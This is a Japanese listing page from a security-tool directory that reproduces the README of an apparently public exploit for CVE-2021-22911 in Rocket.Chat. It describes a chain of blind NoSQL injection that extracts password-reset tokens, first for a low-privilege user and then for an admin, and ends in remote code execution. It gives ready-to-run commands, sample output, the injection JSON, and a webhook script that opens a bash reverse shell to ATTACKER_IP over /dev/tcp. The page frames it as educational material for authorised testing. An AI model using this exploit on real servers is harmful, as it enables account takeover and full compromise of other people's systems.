Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQLインジェクション RCEエクスプロイト - 教育目的 | Kitploit
ツール/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQLインジェクション RCEエクスプロイト - 教育目的

リポジトリを見る
55ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Rocket.Chat CVE-2021-22911 エクスプロイト

⚠️ 免責事項 - 教育目的のみ

このエクスプロイトは、許可された侵入テストおよび教育目的のみで使用してください。コンピュータシステムへの不正アクセスは違法です。作者は誤用について一切責任を負いません。

📋 概要

CVE-2021-22911 は、Rocket.Chat における未認証の重大な NoSQL インジェクション脆弱性であり、リモートコード実行(RCE)につながります。

  • CVSS スコア: 9.8(重大)
  • 影響を受けるバージョン: Rocket.Chat < 3.12.7
  • 攻撃ベクトル: ネットワーク / 未認証
  • 影響: システム全体の完全な侵害

🎯 脆弱性の詳細

このエクスプロイトは、3 つの NoSQL インジェクション攻撃を組み合わせます。

フェーズ 1: 低権限ユーザーのパスワードリセット

  • 低権限ユーザーに対してパスワードリセットのリクエストを送信します
  • ブラインド NoSQL インジェクションで $regex 演算子を使用し、パスワードリセットトークンを 1 文字ずつ抽出します
  • パスワードを既知の値にリセットします

フェーズ 2: 管理者パスワードのリセット

  • フェーズ 1 を繰り返しますが、管理者アカウントを対象とします
  • ブラインド NoSQL インジェクションを介して管理者のパスワードリセットトークンを抽出します
  • 管理者パスワードを変更します

フェーズ 3: リモートコード実行

  • 侵害された管理者アカウントとして認証します
  • JavaScript ペイロードを含む Webhook インテグレーションを作成します
  • ペイロードは Node.js の child_process.exec() を使用してリバースシェルを起動します
  • Webhook をトリガーしてリバースシェルを実行します

🛠️ 前提条件

root@kitploit:~
pip install requests

🚀 使用方法

1. Netcat リスナーを起動(ターミナル 1)

root@kitploit:~
nc -lvnp 4444

2. エクスプロイトを実行(ターミナル 2)

IP を手動入力する場合:

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i 10.9.0.1 \
  -p 4444

tun0 の IP を自動検出する場合(推奨):

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
  -p 4444

引数:

  • -u: 低権限ユーザーのメールアドレス(存在する必要があります)
  • -a: 管理者メールアドレス
  • -t: ターゲット URL(Rocket.Chat インスタンス)
  • -i: 攻撃者の IP(tun0)
  • -p: Netcat リスナーポート

出力例

root@kitploit:~
============================================================
  Rocket.Chat CVE-2021-22911 — RCE
  Target : http://chat.rocket.thm
  Shell  : 10.9.0.1:4444
============================================================

[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234

[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234

[PHASE 3] RCE
[!] Start your listener now:  nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
    userid : userid123456789
    token  : token123456...
[+] Webhook created
    http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener

🔍 技術詳細

NoSQL インジェクションペイロードの形式

root@kitploit:~
{
  "message": {
    "msg": "method",
    "method": "getPasswordPolicy",
    "params": [
      {
        "token": {
          "$regex": "^abc"
        }
      }
    ]
  }
}

RCE ペイロード(Webhook スクリプト)

root@kitploit:~
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}

📚 参考

  • 元のエクスプロイト: enox - Exploit-DB 50078, 50108
  • 脆弱性の分析: SonarSource Blog
  • CVE 詳細: CVE-2021-22911

📝 クレジット

  • enox - 元のエクスプロイト開発
  • SonarSource - 脆弱性の調査と分析

⚖️ 法的通知

このツールは、教育目的および許可されたセキュリティテスト専用に提供されます。コンピュータシステムへの不正アクセスは、コンピュータ詐欺及び濫用取締法(CFAA)およびこれに類似する国際法の下で犯罪行為となります。


責任を持って使用してください。自分が所有するシステム、または明示的な書面による許可を得たシステムのみテストしてください。

ツールをダウンロード